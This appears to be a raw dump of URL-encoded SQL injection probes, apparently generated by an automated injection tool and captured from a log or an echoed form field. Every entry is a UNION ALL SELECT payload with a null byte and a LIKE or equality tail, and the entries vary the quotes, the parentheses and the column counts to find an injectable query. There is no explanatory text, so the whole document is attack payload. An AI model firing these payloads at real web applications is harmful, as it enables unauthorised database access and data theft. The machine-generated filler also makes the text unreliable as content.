-6151%27%29%20UNION%20ALL%20SELECT%206465%2C%206465%2C%206465%2C%206465%2C%206465%2C%206465%2C%206465%2C%206465%2C%206465%2C%206465%2C%206465%2C%206465%2C%206465%2C%206465%2C%206465%2C%206465%2C%206465%2C%206465%2C%206465%2C%206465%2C%206465%2C%206465%2C%206465%2C%206465%00%20AND%20%28%27ovJJ%27%20LIKE%20%27ovJJ -3947%27%29%20UNION%20ALL%20SELECT%206533%2C%206533%2C%206533%2C%206533%2C%206533%2C%206533%2C%206533%2C%206533%2C%206533%2C%206533%2C%206533%2C%206533%2C%206533%2C%206533%2C%206533%2C%206533%2C%206533%2C%206533%2C%206533%2C%206533%2C%206533%2C%206533%2C%206533%2C%206533%2C%206533%00%20AND%20%28%27iuKe%27%20LIKE%20%27iuKe -3855%27%29%20UNION%20ALL%20SELECT%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%2C%206454%00%20AND%20%28%27kfQw%27%20LIKE%20%27kfQw -6447%27%29%20UNION%20ALL%20SELECT%209348%2C%209348%2C%209348%2C%209348%2C%209348%2C%209348%2C%209348%2C%209348%2C%209348%2C%209348%2C%209348%2C%209348%2C%209348%2C%209348%2C%209348%2C%209348%2C%209348%2C%209348%2C%209348%2C%209348%2C%209348%2C%209348%2C%209348%2C%209348%2C%209348%2C%209348%2C%209348%00%20AND%20%28%27zfoS%27%20LIKE%20%27zfoS -8578%27%29%20UNION%20ALL%20SELECT%206649%2C%206649%2C%206649%2C%206649%2C%206649%2C%206649%2C%206649%2C%206649%2C%206649%2C%206649%2C%206649%2C%206649%2C%206649%2C%206649%2C%206649%2C%206649%2C%206649%2C%206649%2C%206649%2C%206649%2C%206649%2C%206649%2C%206649%2C%206649%2C%206649%2C%206649%2C%206649%2C%206649%00%20AND%20%28%27zfiD%27%20LIKE%20%27zfiD -9567%27%29%20UNION%20ALL%20SELECT%208005%2C%208005%2C%208005%2C%208005%2C%208005%2C%208005%2C%208005%2C%208005%2C%208005%2C%208005%2C%208005%2C%208005%2C%208005%2C%208005%2C%208005%2C%208005%2C%208005%2C%208005%2C%208005%2C%208005%2C%208005%2C%208005%2C%208005%2C%208005%2C%208005%2C%208005%2C%208005%2C%208005%2C%208005%00%20AND%20%28%27VVvq%27%20LIKE%20%27VVvq -3380%27%29%20UNION%20ALL%20SELECT%204433%2C%204433%2C%204433%2C%204433%2C%204433%2C%204433%2C%204433%2C%204433%2C%204433%2C%204433%2C%204433%2C%204433%2C%204433%2C%204433%2C%204433%2C%204433%2C%204433%2C%204433%2C%204433%2C%204433%2C%204433%2C%204433%2C%204433%2C%204433%2C%204433%2C%204433%2C%204433%2C%204433%2C%204433%2C%204433%00%20AND%20%28%27lEPi%27%20LIKE%20%27lEPi -4051%27%29%29%20UNION%20ALL%20SELECT%206035%2C%206035%2C%206035%2C%206035%2C%206035%2C%206035%2C%206035%2C%206035%2C%206035%2C%206035%2C%206035%2C%206035%2C%206035%2C%206035%2C%206035%2C%206035%2C%206035%2C%206035%2C%206035%2C%206035%2C%206035%00%20AND%20%28%28%27nhcF%27%20LIKE%20%27nhcF -6119%27%29%29%20UNION%20ALL%20SELECT%207373%2C%207373%2C%207373%2C%207373%2C%207373%2C%207373%2C%207373%2C%207373%2C%207373%2C%207373%2C%207373%2C%207373%2C%207373%2C%207373%2C%207373%2C%207373%2C%207373%2C%207373%2C%207373%2C%207373%2C%207373%2C%207373%00%20AND%20%28%28%27Zjcs%27%20LIKE%20%27Zjcs -8404%27%29%29%20UNION%20ALL%20SELECT%204872%2C%204872%2C%204872%2C%204872%2C%204872%2C%204872%2C%204872%2C%204872%2C%204872%2C%204872%2C%204872%2C%204872%2C%204872%2C%204872%2C%204872%2C%204872%2C%204872%2C%204872%2C%204872%2C%204872%2C%204872%2C%204872%2C%204872%00%20AND%20%28%28%27fmzm%27%20LIKE%20%27fmzm -4816%27%29%29%20UNION%20ALL%20SELECT%203851%2C%203851%2C%203851%2C%203851%2C%203851%2C%203851%2C%203851%2C%203851%2C%203851%2C%203851%2C%203851%2C%203851%2C%203851%2C%203851%2C%203851%2C%203851%2C%203851%2C%203851%2C%203851%2C%203851%2C%203851%2C%203851%2C%203851%2C%203851%00%20AND%20%28%28%27XizI%27%20LIKE%20%27XizI -1065%27%29%29%20UNION%20ALL%20SELECT%204987%2C%204987%2C%204987%2C%204987%2C%204987%2C%204987%2C%204987%2C%204987%2C%204987%2C%204987%2C%204987%2C%204987%2C%204987%2C%204987%2C%204987%2C%204987%2C%204987%2C%204987%2C%204987%2C%204987%2C%204987%2C%204987%2C%204987%2C%204987%2C%204987%00%20AND%20%28%28%27cphG%27%20LIKE%20%27cphG -4728%27%29%29%20UNION%20ALL%20SELECT%205124%2C%205124%2C%205124%2C%205124%2C%205124%2C%205124%2C%205124%2C%205124%2C%205124%2C%205124%2C%205124%2C%205124%2C%205124%2C%205124%2C%205124%2C%205124%2C%205124%2C%205124%2C%205124%2C%205124%2C%205124%2C%205124%2C%205124%2C%205124%2C%205124%2C%205124%00%20AND%20%28%28%27WsTb%27%20LIKE%20%27WsTb -2739%27%29%29%20UNION%20ALL%20SELECT%209421%2C%209421%2C%209421%2C%209421%2C%209421%2C%209421%2C%209421%2C%209421%2C%209421%2C%209421%2C%209421%2C%209421%2C%209421%2C%209421%2C%209421%2C%209421%2C%209421%2C%209421%2C%209421%2C%209421%2C%209421%2C%209421%2C%209421%2C%209421%2C%209421%2C%209421%2C%209421%00%20AND%20%28%28%27Qivx%27%20LIKE%20%27Qivx -2003%27%29%29%20UNION%20ALL%20SELECT%207102%2C%207102%2C%207102%2C%207102%2C%207102%2C%207102%2C%207102%2C%207102%2C%207102%2C%207102%2C%207102%2C%207102%2C%207102%2C%207102%2C%207102%2C%207102%2C%207102%2C%207102%2C%207102%2C%207102%2C%207102%2C%207102%2C%207102%2C%207102%2C%207102%2C%207102%2C%207102%2C%207102%00%20AND%20%28%28%27VZTw%27%20LIKE%20%27VZTw -6985%27%29%29%20UNION%20ALL%20SELECT%209194%2C%209194%2C%209194%2C%209194%2C%209194%2C%209194%2C%209194%2C%209194%2C%209194%2C%209194%2C%209194%2C%209194%2C%209194%2C%209194%2C%209194%2C%209194%2C%209194%2C%209194%2C%209194%2C%209194%2C%209194%2C%209194%2C%209194%2C%209194%2C%209194%2C%209194%2C%209194%2C%209194%2C%209194%00%20AND%20%28%28%27EWHd%27%20LIKE%20%27EWHd -3458%27%29%29%20UNION%20ALL%20SELECT%202978%2C%202978%2C%202978%2C%202978%2C%202978%2C%202978%2C%202978%2C%202978%2C%202978%2C%202978%2C%202978%2C%202978%2C%202978%2C%202978%2C%202978%2C%202978%2C%202978%2C%202978%2C%202978%2C%202978%2C%202978%2C%202978%2C%202978%2C%202978%2C%202978%2C%202978%2C%202978%2C%202978%2C%202978%2C%202978%00%20AND%20%28%28%27cGDi%27%20LIKE%20%27cGDi -3199%27%29%29%29%20UNION%20ALL%20SELECT%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%2C%204833%00%20AND%20%28%28%28%27KRGY%27%20LIKE%20%27KRGY -8374%27%29%29%29%20UNION%20ALL%20SELECT%205989%2C%205989%2C%205989%2C%205989%2C%205989%2C%205989%2C%205989%2C%205989%2C%205989%2C%205989%2C%205989%2C%205989%2C%205989%2C%205989%2C%205989%2C%205989%2C%205989%2C%205989%2C%205989%2C%205989%2C%205989%2C%205989%00%20AND%20%28%28%28%27optv%27%20LIKE%20%27optv -2233%27%29%29%29%20UNION%20ALL%20SELECT%206434%2C%206434%2C%206434%2C%206434%2C%206434%2C%206434%2C%206434%2C%206434%2C%206434%2C%206434%2C%206434%2C%206434%2C%206434%2C%206434%2C%206434%2C%206434%2C%206434%2C%206434%2C%206434%2C%206434%2C%206434%2C%206434%2C%206434%00%20AND%20%28%28%28%27qFwV%27%20LIKE%20%27qFwV -6994%27%29%29%29%20UNION%20ALL%20SELECT%203402%2C%203402%2C%203402%2C%203402%2C%203402%2C%203402%2C%203402%2C%203402%2C%203402%2C%203402%2C%203402%2C%203402%2C%203402%2C%203402%2C%203402%2C%203402%2C%203402%2C%203402%2C%203402%2C%203402%2C%203402%2C%203402%2C%203402%2C%203402%00%20AND%20%28%28%28%27FZCt%27%20LIKE%20%27FZCt -6397%27%29%29%29%20UNION%20ALL%20SELECT%206363%2C%206363%2C%206363%2C%206363%2C%206363%2C%206363%2C%206363%2C%206363%2C%206363%2C%206363%2C%206363%2C%206363%2C%206363%2C%206363%2C%206363%2C%206363%2C%206363%2C%206363%2C%206363%2C%206363%2C%206363%2C%206363%2C%206363%2C%206363%2C%206363%00%20AND%20%28%28%28%27pyVN%27%20LIKE%20%27pyVN -5727%27%29%29%29%20UNION%20ALL%20SELECT%209646%2C%209646%2C%209646%2C%209646%2C%209646%2C%209646%2C%209646%2C%209646%2C%209646%2C%209646%2C%209646%2C%209646%2C%209646%2C%209646%2C%209646%2C%209646%2C%209646%2C%209646%2C%209646%2C%209646%2C%209646%2C%209646%2C%209646%2C%209646%2C%209646%2C%209646%00%20AND%20%28%28%28%27TYbu%27%20LIKE%20%27TYbu -3220%27%29%29%29%20UNION%20ALL%20SELECT%202282%2C%202282%2C%202282%2C%202282%2C%202282%2C%202282%2C%202282%2C%202282%2C%202282%2C%202282%2C%202282%2C%202282%2C%202282%2C%202282%2C%202282%2C%202282%2C%202282%2C%202282%2C%202282%2C%202282%2C%202282%2C%202282%2C%202282%2C%202282%2C%202282%2C%202282%2C%202282%00%20AND%20%28%28%28%27jbtO%27%20LIKE%20%27jbtO -2680%27%29%29%29%20UNION%20ALL%20SELECT%201379%2C%201379%2C%201379%2C%201379%2C%201379%2C%201379%2C%201379%2C%201379%2C%201379%2C%201379%2C%201379%2C%201379%2C%201379%2C%201379%2C%201379%2C%201379%2C%201379%2C%201379%2C%201379%2C%201379%2C%201379%2C%201379%2C%201379%2C%201379%2C%201379%2C%201379%2C%201379%2C%201379%00%20AND%20%28%28%28%27LiPo%27%20LIKE%20%27LiPo -7143%27%29%29%29%20UNION%20ALL%20SELECT%208541%2C%208541%2C%208541%2C%208541%2C%208541%2C%208541%2C%208541%2C%208541%2C%208541%2C%208541%2C%208541%2C%208541%2C%208541%2C%208541%2C%208541%2C%208541%2C%208541%2C%208541%2C%208541%2C%208541%2C%208541%2C%208541%2C%208541%2C%208541%2C%208541%2C%208541%2C%208541%2C%208541%2C%208541%00%20AND%20%28%28%28%27nuwT%27%20LIKE%20%27nuwT -5272%27%29%29%29%20UNION%20ALL%20SELECT%206216%2C%206216%2C%206216%2C%206216%2C%206216%2C%206216%2C%206216%2C%206216%2C%206216%2C%206216%2C%206216%2C%206216%2C%206216%2C%206216%2C%206216%2C%206216%2C%206216%2C%206216%2C%206216%2C%206216%2C%206216%2C%206216%2C%206216%2C%206216%2C%206216%2C%206216%2C%206216%2C%206216%2C%206216%2C%206216%00%20AND%20%28%28%28%27IuWs%27%20LIKE%20%27IuWs -2398%27%20UNION%20ALL%20SELECT%201764%2C%201764%2C%201764%2C%201764%2C%201764%2C%201764%2C%201764%2C%201764%2C%201764%2C%201764%2C%201764%2C%201764%2C%201764%2C%201764%2C%201764%2C%201764%2C%201764%2C%201764%2C%201764%2C%201764%2C%201764%00%20AND%20%27rLVn%27%20LIKE%20%27rLVn -1815%27%20UNION%20ALL%20SELECT%204889%2C%204889%2C%204889%2C%204889%2C%204889%2C%204889%2C%204889%2C%204889%2C%204889%2C%204889%2C%204889%2C%204889%2C%204889%2C%204889%2C%204889%2C%204889%2C%204889%2C%204889%2C%204889%2C%204889%2C%204889%2C%204889%00%20AND%20%27OMzH%27%20LIKE%20%27OMzH -4805%27%20UNION%20ALL%20SELECT%204687%2C%204687%2C%204687%2C%204687%2C%204687%2C%204687%2C%204687%2C%204687%2C%204687%2C%204687%2C%204687%2C%204687%2C%204687%2C%204687%2C%204687%2C%204687%2C%204687%2C%204687%2C%204687%2C%204687%2C%204687%2C%204687%2C%204687%00%20AND%20%27ZUmF%27%20LIKE%20%27ZUmF -7015%27%20UNION%20ALL%20SELECT%202143%2C%202143%2C%202143%2C%202143%2C%202143%2C%202143%2C%202143%2C%202143%2C%202143%2C%202143%2C%202143%2C%202143%2C%202143%2C%202143%2C%202143%2C%202143%2C%202143%2C%202143%2C%202143%2C%202143%2C%202143%2C%202143%2C%202143%2C%202143%00%20AND%20%27QqPm%27%20LIKE%20%27QqPm -8238%27%20UNION%20ALL%20SELECT%208391%2C%208391%2C%208391%2C%208391%2C%208391%2C%208391%2C%208391%2C%208391%2C%208391%2C%208391%2C%208391%2C%208391%2C%208391%2C%208391%2C%208391%2C%208391%2C%208391%2C%208391%2C%208391%2C%208391%2C%208391%2C%208391%2C%208391%2C%208391%2C%208391%00%20AND%20%27KIGy%27%20LIKE%20%27KIGy -1341%27%20UNION%20ALL%20SELECT%207914%2C%207914%2C%207914%2C%207914%2C%207914%2C%207914%2C%207914%2C%207914%2C%207914%2C%207914%2C%207914%2C%207914%2C%207914%2C%207914%2C%207914%2C%207914%2C%207914%2C%207914%2C%207914%2C%207914%2C%207914%2C%207914%2C%207914%2C%207914%2C%207914%2C%207914%00%20AND%20%27wElX%27%20LIKE%20%27wElX -8389%27%20UNION%20ALL%20SELECT%208024%2C%208024%2C%208024%2C%208024%2C%208024%2C%208024%2C%208024%2C%208024%2C%208024%2C%208024%2C%208024%2C%208024%2C%208024%2C%208024%2C%208024%2C%208024%2C%208024%2C%208024%2C%208024%2C%208024%2C%208024%2C%208024%2C%208024%2C%208024%2C%208024%2C%208024%2C%208024%00%20AND%20%27bzly%27%20LIKE%20%27bzly -2860%27%20UNION%20ALL%20SELECT%201294%2C%201294%2C%201294%2C%201294%2C%201294%2C%201294%2C%201294%2C%201294%2C%201294%2C%201294%2C%201294%2C%201294%2C%201294%2C%201294%2C%201294%2C%201294%2C%201294%2C%201294%2C%201294%2C%201294%2C%201294%2C%201294%2C%201294%2C%201294%2C%201294%2C%201294%2C%201294%2C%201294%00%20AND%20%27WggY%27%20LIKE%20%27WggY -1930%27%20UNION%20ALL%20SELECT%202642%2C%202642%2C%202642%2C%202642%2C%202642%2C%202642%2C%202642%2C%202642%2C%202642%2C%202642%2C%202642%2C%202642%2C%202642%2C%202642%2C%202642%2C%202642%2C%202642%2C%202642%2C%202642%2C%202642%2C%202642%2C%202642%2C%202642%2C%202642%2C%202642%2C%202642%2C%202642%2C%202642%2C%202642%00%20AND%20%27xMLR%27%20LIKE%20%27xMLR -1670%27%20UNION%20ALL%20SELECT%203895%2C%203895%2C%203895%2C%203895%2C%203895%2C%203895%2C%203895%2C%203895%2C%203895%2C%203895%2C%203895%2C%203895%2C%203895%2C%203895%2C%203895%2C%203895%2C%203895%2C%203895%2C%203895%2C%203895%2C%203895%2C%203895%2C%203895%2C%203895%2C%203895%2C%203895%2C%203895%2C%203895%2C%203895%2C%203895%00%20AND%20%27oxrE%27%20LIKE%20%27oxrE -2534%22%29%20UNION%20ALL%20SELECT%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%00%20AND%20%28%22nmxq%22%3D%22nmxq -1631%22%29%20UNION%20ALL%20SELECT%205671%2C%205671%2C%205671%2C%205671%2C%205671%2C%205671%2C%205671%2C%205671%2C%205671%2C%205671%2C%205671%2C%205671%2C%205671%2C%205671%2C%205671%2C%205671%2C%205671%2C%205671%2C%205671%2C%205671%2C%205671%2C%205671%00%20AND%20%28%22HiPm%22%3D%22HiPm -6575%22%29%20UNION%20ALL%20SELECT%207674%2C%207674%2C%207674%2C%207674%2C%207674%2C%207674%2C%207674%2C%207674%2C%207674%2C%207674%2C%207674%2C%207674%2C%207674%2C%207674%2C%207674%2C%207674%2C%207674%2C%207674%2C%207674%2C%207674%2C%207674%2C%207674%2C%207674%00%20AND%20%28%22Juix%22%3D%22Juix -4435%22%29%20UNION%20ALL%20SELECT%206721%2C%206721%2C%206721%2C%206721%2C%206721%2C%206721%2C%206721%2C%206721%2C%206721%2C%206721%2C%206721%2C%206721%2C%206721%2C%206721%2C%206721%2C%206721%2C%206721%2C%206721%2C%206721%2C%206721%2C%206721%2C%206721%2C%206721%2C%206721%00%20AND%20%28%22tplQ%22%3D%22tplQ -6525%22%29%20UNION%20ALL%20SELECT%204766%2C%204766%2C%204766%2C%204766%2C%204766%2C%204766%2C%204766%2C%204766%2C%204766%2C%204766%2C%204766%2C%204766%2C%204766%2C%204766%2C%204766%2C%204766%2C%204766%2C%204766%2C%204766%2C%204766%2C%204766%2C%204766%2C%204766%2C%204766%2C%204766%00%20AND%20%28%22VPxL%22%3D%22VPxL -4656%22%29%20UNION%20ALL%20SELECT%206847%2C%206847%2C%206847%2C%206847%2C%206847%2C%206847%2C%206847%2C%206847%2C%206847%2C%206847%2C%206847%2C%206847%2C%206847%2C%206847%2C%206847%2C%206847%2C%206847%2C%206847%2C%206847%2C%206847%2C%206847%2C%206847%2C%206847%2C%206847%2C%206847%2C%206847%00%20AND%20%28%22yoTO%22%3D%22yoTO -8286%22%29%20UNION%20ALL%20SELECT%207013%2C%207013%2C%207013%2C%207013%2C%207013%2C%207013%2C%207013%2C%207013%2C%207013%2C%207013%2C%207013%2C%207013%2C%207013%2C%207013%2C%207013%2C%207013%2C%207013%2C%207013%2C%207013%2C%207013%2C%207013%2C%207013%2C%207013%2C%207013%2C%207013%2C%207013%2C%207013%00%20AND%20%28%22jFTz%22%3D%22jFTz -4429%22%29%20UNION%20ALL%20SELECT%206634%2C%206634%2C%206634%2C%206634%2C%206634%2C%206634%2C%206634%2C%206634%2C%206634%2C%206634%2C%206634%2C%206634%2C%206634%2C%206634%2C%206634%2C%206634%2C%206634%2C%206634%2C%206634%2C%206634%2C%206634%2C%206634%2C%206634%2C%206634%2C%206634%2C%206634%2C%206634%2C%206634%00%20AND%20%28%22rgQi%22%3D%22rgQi -2789%22%29%20UNION%20ALL%20SELECT%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%2C%204851%00%20AND%20%28%22Ylbx%22%3D%22Ylbx -5393%22%29%20UNION%20ALL%20SELECT%201661%2C%201661%2C%201661%2C%201661%2C%201661%2C%201661%2C%201661%2C%201661%2C%201661%2C%201661%2C%201661%2C%201661%2C%201661%2C%201661%2C%201661%2C%201661%2C%201661%2C%201661%2C%201661%2C%201661%2C%201661%2C%201661%2C%201661%2C%201661%2C%201661%2C%201661%2C%201661%2C%201661%2C%201661%2C%201661%00%20AND%20%28%22qbmT%22%3D%22qbmT -1369%22%29%29%20UNION%20ALL%20SELECT%209599%2C%209599%2C%209599%2C%209599%2C%209599%2C%209599%2C%209599%2C%209599%2C%209599%2C%209599%2C%209599%2C%209599%2C%209599%2C%209599%2C%209599%2C%209599%2C%209599%2C%209599%2C%209599%2C%209599%2C%209599%00%20AND%20%28%28%22gTwp%22%3D%22gTwp -1550%22%29%29%20UNION%20ALL%20SELECT%201080%2C%201080%2C%201080%2C%201080%2C%201080%2C%201080%2C%201080%2C%201080%2C%201080%2C%201080%2C%201080%2C%201080%2C%201080%2C%201080%2C%201080%2C%201080%2C%201080%2C%201080%2C%201080%2C%201080%2C%201080%2C%201080%00%20AND%20%28%28%22KsHj%22%3D%22KsHj -4978%22%29%29%20UNION%20ALL%20SELECT%204130%2C%204130%2C%204130%2C%204130%2C%204130%2C%204130%2C%204130%2C%204130%2C%204130%2C%204130%2C%204130%2C%204130%2C%204130%2C%204130%2C%204130%2C%204130%2C%204130%2C%204130%2C%204130%2C%204130%2C%204130%2C%204130%2C%204130%00%20AND%20%28%28%22AUTW%22%3D%22AUTW -8561%22%29%29%20UNION%20ALL%20SELECT%202537%2C%202537%2C%202537%2C%202537%2C%202537%2C%202537%2C%202537%2C%202537%2C%202537%2C%202537%2C%202537%2C%202537%2C%202537%2C%202537%2C%202537%2C%202537%2C%202537%2C%202537%2C%202537%2C%202537%2C%202537%2C%202537%2C%202537%2C%202537%00%20AND%20%28%28%22hWQv%22%3D%22hWQv -8755%22%29%29%20UNION%20ALL%20SELECT%209592%2C%209592%2C%209592%2C%209592%2C%209592%2C%209592%2C%209592%2C%209592%2C%209592%2C%209592%2C%209592%2C%209592%2C%209592%2C%209592%2C%209592%2C%209592%2C%209592%2C%209592%2C%209592%2C%209592%2C%209592%2C%209592%2C%209592%2C%209592%2C%209592%00%20AND%20%28%28%22yMUe%22%3D%22yMUe -8403%22%29%29%20UNION%20ALL%20SELECT%206525%2C%206525%2C%206525%2C%206525%2C%206525%2C%206525%2C%206525%2C%206525%2C%206525%2C%206525%2C%206525%2C%206525%2C%206525%2C%206525%2C%206525%2C%206525%2C%206525%2C%206525%2C%206525%2C%206525%2C%206525%2C%206525%2C%206525%2C%206525%2C%206525%2C%206525%00%20AND%20%28%28%22fNhL%22%3D%22fNhL -1985%22%29%29%20UNION%20ALL%20SELECT%202278%2C%202278%2C%202278%2C%202278%2C%202278%2C%202278%2C%202278%2C%202278%2C%202278%2C%202278%2C%202278%2C%202278%2C%202278%2C%202278%2C%202278%2C%202278%2C%202278%2C%202278%2C%202278%2C%202278%2C%202278%2C%202278%2C%202278%2C%202278%2C%202278%2C%202278%2C%202278%00%20AND%20%28%28%22xNpv%22%3D%22xNpv -8742%22%29%29%20UNION%20ALL%20SELECT%209521%2C%209521%2C%209521%2C%209521%2C%209521%2C%209521%2C%209521%2C%209521%2C%209521%2C%209521%2C%209521%2C%209521%2C%209521%2C%209521%2C%209521%2C%209521%2C%209521%2C%209521%2C%209521%2C%209521%2C%209521%2C%209521%2C%209521%2C%209521%2C%209521%2C%209521%2C%209521%2C%209521%00%20AND%20%28%28%22vyAn%22%3D%22vyAn -4186%22%29%29%20UNION%20ALL%20SELECT%205318%2C%205318%2C%205318%2C%205318%2C%205318%2C%205318%2C%205318%2C%205318%2C%205318%2C%205318%2C%205318%2C%205318%2C%205318%2C%205318%2C%205318%2C%205318%2C%205318%2C%205318%2C%205318%2C%205318%2C%205318%2C%205318%2C%205318%2C%205318%2C%205318%2C%205318%2C%205318%2C%205318%2C%205318%00%20AND%20%28%28%22jPoX%22%3D%22jPoX -5924%22%29%29%20UNION%20ALL%20SELECT%204251%2C%204251%2C%204251%2C%204251%2C%204251%2C%204251%2C%204251%2C%204251%2C%204251%2C%204251%2C%204251%2C%204251%2C%204251%2C%204251%2C%204251%2C%204251%2C%204251%2C%204251%2C%204251%2C%204251%2C%204251%2C%204251%2C%204251%2C%204251%2C%204251%2C%204251%2C%204251%2C%204251%2C%204251%2C%204251%00%20AND%20%28%28%22kWVz%22%3D%22kWVz -3198%22%29%29%29%20UNION%20ALL%20SELECT%209482%2C%209482%2C%209482%2C%209482%2C%209482%2C%209482%2C%209482%2C%209482%2C%209482%2C%209482%2C%209482%2C%209482%2C%209482%2C%209482%2C%209482%2C%209482%2C%209482%2C%209482%2C%209482%2C%209482%2C%209482%00%20AND%20%28%28%28%22HtKW%22%3D%22HtKW -7283%22%29%29%29%20UNION%20ALL%20SELECT%205510%2C%205510%2C%205510%2C%205510%2C%205510%2C%205510%2C%205510%2C%205510%2C%205510%2C%205510%2C%205510%2C%205510%2C%205510%2C%205510%2C%205510%2C%205510%2C%205510%2C%205510%2C%205510%2C%205510%2C%205510%2C%205510%00%20AND%20%28%28%28%22GnHl%22%3D%22GnHl -6584%22%29%29%29%20UNION%20ALL%20SELECT%203397%2C%203397%2C%203397%2C%203397%2C%203397%2C%203397%2C%203397%2C%203397%2C%203397%2C%203397%2C%203397%2C%203397%2C%203397%2C%203397%2C%203397%2C%203397%2C%203397%2C%203397%2C%203397%2C%203397%2C%203397%2C%203397%2C%203397%00%20AND%20%28%28%28%22PHGx%22%3D%22PHGx -9937%22%29%29%29%20UNION%20ALL%20SELECT%202234%2C%202234%2C%202234%2C%202234%2C%202234%2C%202234%2C%202234%2C%202234%2C%202234%2C%202234%2C%202234%2C%202234%2C%202234%2C%202234%2C%202234%2C%202234%2C%202234%2C%202234%2C%202234%2C%202234%2C%202234%2C%202234%2C%202234%2C%202234%00%20AND%20%28%28%28%22MLgP%22%3D%22MLgP -5125%22%29%29%29%20UNION%20ALL%20SELECT%203366%2C%203366%2C%203366%2C%203366%2C%203366%2C%203366%2C%203366%2C%203366%2C%203366%2C%203366%2C%203366%2C%203366%2C%203366%2C%203366%2C%203366%2C%203366%2C%203366%2C%203366%2C%203366%2C%203366%2C%203366%2C%203366%2C%203366%2C%203366%2C%203366%00%20AND%20%28%28%28%22NuUY%22%3D%22NuUY -3984%22%29%29%29%20UNION%20ALL%20SELECT%208748%2C%208748%2C%208748%2C%208748%2C%208748%2C%208748%2C%208748%2C%208748%2C%208748%2C%208748%2C%208748%2C%208748%2C%208748%2C%208748%2C%208748%2C%208748%2C%208748%2C%208748%2C%208748%2C%208748%2C%208748%2C%208748%2C%208748%2C%208748%2C%208748%2C%208748%00%20AND%20%28%28%28%22IFim%22%3D%22IFim -7539%22%29%29%29%20UNION%20ALL%20SELECT%203362%2C%203362%2C%203362%2C%203362%2C%203362%2C%203362%2C%203362%2C%203362%2C%203362%2C%203362%2C%203362%2C%203362%2C%203362%2C%203362%2C%203362%2C%203362%2C%203362%2C%203362%2C%203362%2C%203362%2C%203362%2C%203362%2C%203362%2C%203362%2C%203362%2C%203362%2C%203362%00%20AND%20%28%28%28%22PcFV%22%3D%22PcFV -8350%22%29%29%29%20UNION%20ALL%20SELECT%203940%2C%203940%2C%203940%2C%203940%2C%203940%2C%203940%2C%203940%2C%203940%2C%203940%2C%203940%2C%203940%2C%203940%2C%203940%2C%203940%2C%203940%2C%203940%2C%203940%2C%203940%2C%203940%2C%203940%2C%203940%2C%203940%2C%203940%2C%203940%2C%203940%2C%203940%2C%203940%2C%203940%00%20AND%20%28%28%28%22BSfI%22%3D%22BSfI -8361%22%29%29%29%20UNION%20ALL%20SELECT%205692%2C%205692%2C%205692%2C%205692%2C%205692%2C%205692%2C%205692%2C%205692%2C%205692%2C%205692%2C%205692%2C%205692%2C%205692%2C%205692%2C%205692%2C%205692%2C%205692%2C%205692%2C%205692%2C%205692%2C%205692%2C%205692%2C%205692%2C%205692%2C%205692%2C%205692%2C%205692%2C%205692%2C%205692%00%20AND%20%28%28%28%22xzcT%22%3D%22xzcT -4377%22%29%29%29%20UNION%20ALL%20SELECT%202205%2C%202205%2C%202205%2C%202205%2C%202205%2C%202205%2C%202205%2C%202205%2C%202205%2C%202205%2C%202205%2C%202205%2C%202205%2C%202205%2C%202205%2C%202205%2C%202205%2C%202205%2C%202205%2C%202205%2C%202205%2C%202205%2C%202205%2C%202205%2C%202205%2C%202205%2C%202205%2C%202205%2C%202205%2C%202205%00%20AND%20%28%28%28%22ukTs%22%3D%22ukTs -8329%22%20UNION%20ALL%20SELECT%202491%2C%202491%2C%202491%2C%202491%2C%202491%2C%202491%2C%202491%2C%202491%2C%202491%2C%202491%2C%202491%2C%202491%2C%202491%2C%202491%2C%202491%2C%202491%2C%202491%2C%202491%2C%202491%2C%202491%2C%202491%00%20AND%20%22pnTv%22%3D%22pnTv -5691%22%20UNION%20ALL%20SELECT%205411%2C%205411%2C%205411%2C%205411%2C%205411%2C%205411%2C%205411%2C%205411%2C%205411%2C%205411%2C%205411%2C%205411%2C%205411%2C%205411%2C%205411%2C%205411%2C%205411%2C%205411%2C%205411%2C%205411%2C%205411%2C%205411%00%20AND%20%22oBWG%22%3D%22oBWG -5268%22%20UNION%20ALL%20SELECT%204700%2C%204700%2C%204700%2C%204700%2C%204700%2C%204700%2C%204700%2C%204700%2C%204700%2C%204700%2C%204700%2C%204700%2C%204700%2C%204700%2C%204700%2C%204700%2C%204700%2C%204700%2C%204700%2C%204700%2C%204700%2C%204700%2C%204700%00%20AND%20%22vFmS%22%3D%22vFmS -1866%22%20UNION%20ALL%20SELECT%202467%2C%202467%2C%202467%2C%202467%2C%202467%2C%202467%2C%202467%2C%202467%2C%202467%2C%202467%2C%202467%2C%202467%2C%202467%2C%202467%2C%202467%2C%202467%2C%202467%2C%202467%2C%202467%2C%202467%2C%202467%2C%202467%2C%202467%2C%202467%00%20AND%20%22LVEr%22%3D%22LVEr -9895%22%20UNION%20ALL%20SELECT%209779%2C%209779%2C%209779%2C%209779%2C%209779%2C%209779%2C%209779%2C%209779%2C%209779%2C%209779%2C%209779%2C%209779%2C%209779%2C%209779%2C%209779%2C%209779%2C%209779%2C%209779%2C%209779%2C%209779%2C%209779%2C%209779%2C%209779%2C%209779%2C%209779%00%20AND%20%22SJeT%22%3D%22SJeT -1175%22%20UNION%20ALL%20SELECT%207481%2C%207481%2C%207481%2C%207481%2C%207481%2C%207481%2C%207481%2C%207481%2C%207481%2C%207481%2C%207481%2C%207481%2C%207481%2C%207481%2C%207481%2C%207481%2C%207481%2C%207481%2C%207481%2C%207481%2C%207481%2C%207481%2C%207481%2C%207481%2C%207481%2C%207481%00%20AND%20%22SSob%22%3D%22SSob 